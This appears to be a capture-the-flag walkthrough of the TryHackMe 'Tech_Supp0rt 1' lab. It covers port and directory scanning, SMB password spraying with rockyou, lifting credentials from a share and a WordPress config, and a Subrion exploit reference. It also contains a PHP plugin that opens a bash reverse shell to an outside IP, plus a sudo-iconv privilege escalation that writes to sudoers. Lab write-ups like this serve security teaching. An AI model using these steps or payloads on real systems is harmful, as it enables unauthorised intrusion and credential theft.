CTF Tech_Supp0rt 1

CTFTryHackMe

Rustscan

1
rustscan -a 10.10.75.149

Output:

1
2
3
4
22/tcp  open  ssh          syn-ack
80/tcp  open  http         syn-ack
139/tcp open  netbios-ssn  syn-ack
445/tcp open  microsoft-ds syn-ack

gobuster

1
gobuster dir -u http://10.10.75.149/ -w /usr/share/wordlists/dirb/common.txt -x txt,php,html

Output:

1
2
3
4
5
/phpinfo.php          (Status: 200) [Size: 94928]
/phpinfo.php          (Status: 200) [Size: 94928]
/server-status        (Status: 403) [Size: 277]
/test                 (Status: 301) [Size: 311] [--> http://10.10.75.149/test/]
/wordpress            (Status: 301) [Size: 316] [--> http://10.10.75.149/wordpress/]

We have 2 website:

  • wordpress
  • scam page

wpscan

1
wpscan --url http://10.10.75.149/wordpress/ --enumerate u

Output

1
2
3
4
5
6
7
8
9
[+] WordPress version 5.7.2 identified (Insecure, released on 2021-05-12).
...
[+] WordPress theme in use: teczilla
[!] The version is out of date, the latest version is 1.1.4
...
[+] support
...
http://10.10.75.149/wordpress/index.php/index.php/wp-json/wp/v2/users/?per_page=100&page=1
...

smb

1
crackmapexec smb 10.10.75.149 -u support -p /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Output:

1
support:123456
1
smbmap -H 10.10.75.149 -R -u "support" -p "123456"

Output:

1
2
3
4
5
6
7
8
9
10
[+] IP: 10.10.75.149:445	Name: 10.10.75.149        	Status: Guest session   	
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	print$                                            	NO ACCESS	Printer Drivers
	websvr                                            	READ ONLY	
	.\websvr\\*
	dr--r--r--                0 Sat May 29 09:17:38 2021	.
	dr--r--r--                0 Sat May 29 09:03:47 2021	..
	fr--r--r--              273 Sat May 29 09:17:38 2021	enter.txt
	IPC$                                              	NO ACCESS	IPC Service (TechSupport server (Samba, Ubuntu))
1
2
3
4
5
6
7
8
9
10
11
12
13
14
smbclient //10.10.75.149/websvr -U "support"

Password for [WORKGROUP\support]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat May 29 09:17:38 2021
  ..                                  D        0  Sat May 29 09:03:47 2021
  enter.txt                           N      273  Sat May 29 09:17:38 2021

		8460484 blocks of size 1024. 5695980 blocks available
smb: \> cat enter.txt
cat: command not found
smb: \> more enter.txt
getting file \enter.txt of size 273 as /tmp/smbmore.KPey6E (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
1
2
3
4
5
6
7
8
9
10
11
12
GOALS
=====
1)Make fake popup and host it online on Digital Ocean server
2)Fix subrion site, /subrion doesn't work, edit from panel
3)Edit wordpress website

IMP
===
Subrion creds
|->admin:7sKvntXdPEJaxazce9PXi24zaFrLiKWCk [cooked with magical formula]
Wordpress creds
|->

This hash is cooked: 7sKvntXdPEJaxazce9PXi24zaFrLiKWCk


Scam2021

Let’s see what is subrion:
https://www.exploit-db.com/exploits/49876

shell

1
parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri http://target/panel")

This revershell don’t smell good…

1
2
3
4
5
6
cat /etc/passwd

scamsite:x:1000:1000:scammer,,,:/home/scamsite:/bin/bash


cat /var/www/*/w*/*config*

Wordpress creds:
user: support
password: ImAScammerLOL!123!

wordpress revershell

wp_plugin_rv.php

1
2
3
4
5
6
7
8
9
10
11
12
13
<?php

/**
* Plugin Name: Reverse Shell Plugin
* Plugin URI:
* Description: Reverse Shell Plugin
* Version: 1.0
* Author: Vince Matteo
* Author URI: http://peanutstick.githubio.com
*/

exec("/bin/bash -c 'bash -i >& /dev/tcp/10.8.50.167/4949 0>&1'");
?>

Then listen:

1
nc -lnvp 4949

Upload it:

ssh

1
ssh [email protected]

With the last password.

1
2
3
sudo -l
...
    (ALL) NOPASSWD: /usr/bin/iconv

https://gtfobins.github.io/gtfobins/iconv/

privesc

1
2
echo "scamsite ALL=(ALL:ALL) ALL" | sudo iconv -f 8859_1 -t 8859_1 -o "$LFILE" 
sudo su